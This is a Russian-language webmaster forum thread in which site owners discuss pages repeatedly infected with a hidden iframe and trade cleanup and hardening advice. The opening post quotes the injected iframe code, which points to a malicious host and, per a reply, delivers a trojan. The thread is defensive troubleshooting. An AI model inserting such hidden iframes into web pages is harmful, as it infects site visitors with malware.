Реклама на сайте Advertise with us

Снова вирусы

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440

Ссылка на сообщениеДобавлено: 11/07/09 в 10:10       Ответить с цитатойцитата 

Поймал какуе-то хуйню, заражаются файлы .php .html таким инфреймом
Код:

<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi96" width=125 height=125 style="visibility: hidden"></iframe>


чищу, но он снова появляется. Лезет в файлы smartcj, progress'a и еще в linkex есть тоже. Как его поймать? все пассы поменял, на фтп тоже icon_neutral.gif

EvaPharmacy - лучшая фарма партнерка (ICQ: 750000 Jabber: evasupport@jabber.org)

0
 

No pain,no gain.

С нами с 12.05.08
Сообщения: 1200
Рейтинг: 1309

Ссылка на сообщениеДобавлено: 11/07/09 в 11:32       Ответить с цитатойцитата 

У меня тоже этот ублюдок понасырал и на сиджах и на блогах icon_evil.gif(во всех файлах где присутствует слово index) Почистил, пароли сменил вроде все ок. Тьфу-Тьфу-Тьфу

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 11/07/09 в 11:50       Ответить с цитатойцитата 

Цитата:
Как его поймать?
Пинать админов, пусть смотрят логи.

Cdn быстро, надёжно и недорого!

0
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 11/07/09 в 12:19       Ответить с цитатойцитата 

Gidz писал:
Как его поймать?

Да ни как - спамеры непобедимы.

Поискал трой, который грузиться по ссылке из ифрейма:
http://www.google.ru/search?hl=ru&q=%22Trojan.Win32.Agent2.kvp%…=f&oq=
icon_smile.gif
А ты их ловить собираешься.

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 11/07/09 в 12:31       Ответить с цитатойцитата 

Yacc: Чё вдруг "никак" ? icon_smile.gif Обычно вся эта лажа написана из расчёта "под дефолтный сервак", полюбому видна в логах (если их вести) и исправляется, было б желание ...

Cdn быстро, надёжно и недорого!

4
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 11/07/09 в 13:10       Ответить с цитатойцитата 

Woland: Думаешь, что когда не останется серверов с дефолтными настройками, выключенными логами и ленивыми админами - спамеры и иже с ними сразу вымрут?
Кстати не такая уж это и лажа. А когда она на живом сидже, так это вообще катастрофа.

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 11/07/09 в 13:15       Ответить с цитатойцитата 

Цитата:
Думаешь, что когда не останется серверов с дефолтными настройками, выключенными логами и ленивыми админами
Кто сказал, что так когда-то будет ? smail101.gif Но пока оно пишется вот так и особой проблемы отловить обычно нет, было бы желание, о чём я и писал (ну а чё написать - опусти руки, не парься - смысла отлавливать нет ?)

Цитата:
Кстати не такая уж это и лажа. А когда она на живом сидже, так это вообще катастрофа.
Я не трактую слово "лажа", как синоним слова "мелочь" - само-собой это очень херовая вещь, на сидже тем более ...

Cdn быстро, надёжно и недорого!

4
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 11/07/09 в 13:52       Ответить с цитатойцитата 

Пардон. Я решил, что тс собрался бота ловить. icon_smile.gif

2 тс: Должен быть скрипт, который ифрейм пишет. Найди его, потом по сигнатуре ищи во всех файлах. Свой комп тоже проверь.
Очень нестандартный трейдер или взлом АТS?
Help! Защита от заливки чужих РНР

А вот и хостер: masterhost.ru
http://www.malwaredomainlist.com/mdl.php?search=masterhost&cols…uantity=50

Касперский троя в свои базы добавил 8 июля.
http://www.kaspersky.ru/viruswatchlite?search_virus=trojan.win32.ag…=0&y=0

Вот сюда загляни
http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/
может помочь.

Последний раз редактировалось: Yacc (11/07/09 в 15:20), всего редактировалось 1 раз

4
 

Мотиватор :)

С нами с 06.05.09
Сообщения: 3028
Рейтинг: 607

Ссылка на сообщениеДобавлено: 11/07/09 в 15:03       Ответить с цитатойцитата 

подобная хрень меня терроризировала одно время, причем хостер говорит установить права на запись только для хозяина, но хрен там. оказалось, что оно дописывается по фтп (т.е троян скачивает - изменяет - закачивает обратно файлы на сервак). а потом нашел статью, где описан этот способ взлома через дыры в CPanel. долго писал в саппорт хостера, а потом они проапгрейдили спанел и всё прекратилось.

Just a signature.

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 11/07/09 в 15:58       Ответить с цитатойцитата 

Панели (особенно популярные, а не качественные, но самописные) вообще зло. И ftp протокол, кстати - тоже icon_smile.gif

Cdn быстро, надёжно и недорого!

4
 



С нами с 18.05.09
Сообщения: 571
Рейтинг: 403

Ссылка на сообщениеДобавлено: 11/07/09 в 17:24       Ответить с цитатойцитата 

а все же какая природа появления вирусов помогите понять более точно?
расхлябанность овнера, которому в падлу поставить антивирус с лицензией?
непредусмотрительность админов хостинга по настройке безопасности?
чаще всего - как появляются вирусы на сиджах?

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 11/07/09 в 17:37       Ответить с цитатойцитата 

rrr: Дырки в скриптах, особенно популярных, дырки и беспечность в настройках сервера, нежелание отойти на шаг от привычки и озаботиться мерами безопасности (например не юзать ftp вообще, юзать ограничение по IP, юзать не IE, антивирус+файрволл на машине, разные пароли, а не один на всё (мыла, админки, акки), иногда интересоваться содержимым автозагрузки своей винды, а не только тогда, когда уже не можешь работать ну и т.д.).

Cdn быстро, надёжно и недорого!

4
 



С нами с 18.05.09
Сообщения: 571
Рейтинг: 403

Ссылка на сообщениеДобавлено: 11/07/09 в 17:42       Ответить с цитатойцитата 

Woland
ну т.е. по сути за редким исключением овнер сам виноват в произошедшем - можно так сказать в заключении?

4
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 11/07/09 в 18:05       Ответить с цитатойцитата 

rrr: Нет, наравне с кодерами, которые не всегда утруждаются (или не обладают квалификацией достаточной) думать о безопасности писанного ими кода.
Если в скрипте конкретная дыра, скрипт стал популярным и дыру нашли - овнер в этом никак не виноват и предусмотрительность админов и овнера в плане безопасности не всегда способна помочь при таком раскладе.

Cdn быстро, надёжно и недорого!

4
 

Добрый ОС :=)

С нами с 12.04.04
Сообщения: 8319
Рейтинг: 3291

Ссылка на сообщениеДобавлено: 11/07/09 в 19:38       Ответить с цитатойцитата 

Перезалей фсе файлы на хосте, если есть возможность и меняй пассы на фтп. Тоже подобное было - увелы пассы на фтп.

Работа вебкам моделью - работай из дома и зарабатывай большие деньги!

4
 

Мотиватор :)

С нами с 06.05.09
Сообщения: 3028
Рейтинг: 607

Ссылка на сообщениеДобавлено: 12/07/09 в 04:12       Ответить с цитатойцитата 

у нас уже давно не юзается фтп, и вайтлист по айпи - но это возможно только на дедике.

Just a signature.

4
 



С нами с 22.08.08
Сообщения: 1452
Рейтинг: 440

Ссылка на сообщениеДобавлено: 13/07/09 в 00:02       Ответить с цитатойцитата 

бля, насоздавались во всех папках каждого сайта index.php, это пиздец, их там тысячи, как их теперь все удалить что бы нужные не попортить ума не приложу icon_evil.gif

EvaPharmacy - лучшая фарма партнерка (ICQ: 750000 Jabber: evasupport@jabber.org)

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 13/07/09 в 00:07       Ответить с цитатойцитата 

Gidz: По размеру может скриптом, если они маленькие создаются ?

Cdn быстро, надёжно и недорого!

4
 



С нами с 19.09.03
Сообщения: 1988
Рейтинг: 1247


Передовик Master-X (01.02.2004) Передовик Master-X (16.03.2004)
Ссылка на сообщениеДобавлено: 13/07/09 в 00:54       Ответить с цитатойцитата 

По дате создания?

upd. По содержимому? icon_rolleyes.gif

4
 

No pain,no gain.

С нами с 12.05.08
Сообщения: 1200
Рейтинг: 1309

Ссылка на сообщениеДобавлено: 13/07/09 в 01:04       Ответить с цитатойцитата 

Wahoven писал:
По дате создания?

upd. По содержимому? icon_rolleyes.gif

Я по дате у себя все задетектил

4
 



С нами с 25.03.08
Сообщения: 462
Рейтинг: 75

Ссылка на сообщениеДобавлено: 14/07/09 в 11:24       Ответить с цитатойцитата 

у меня была такая хрень, трой создавал файл servises.exe в папке систем32, когда его удалил больше ифрейм не появлялся

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »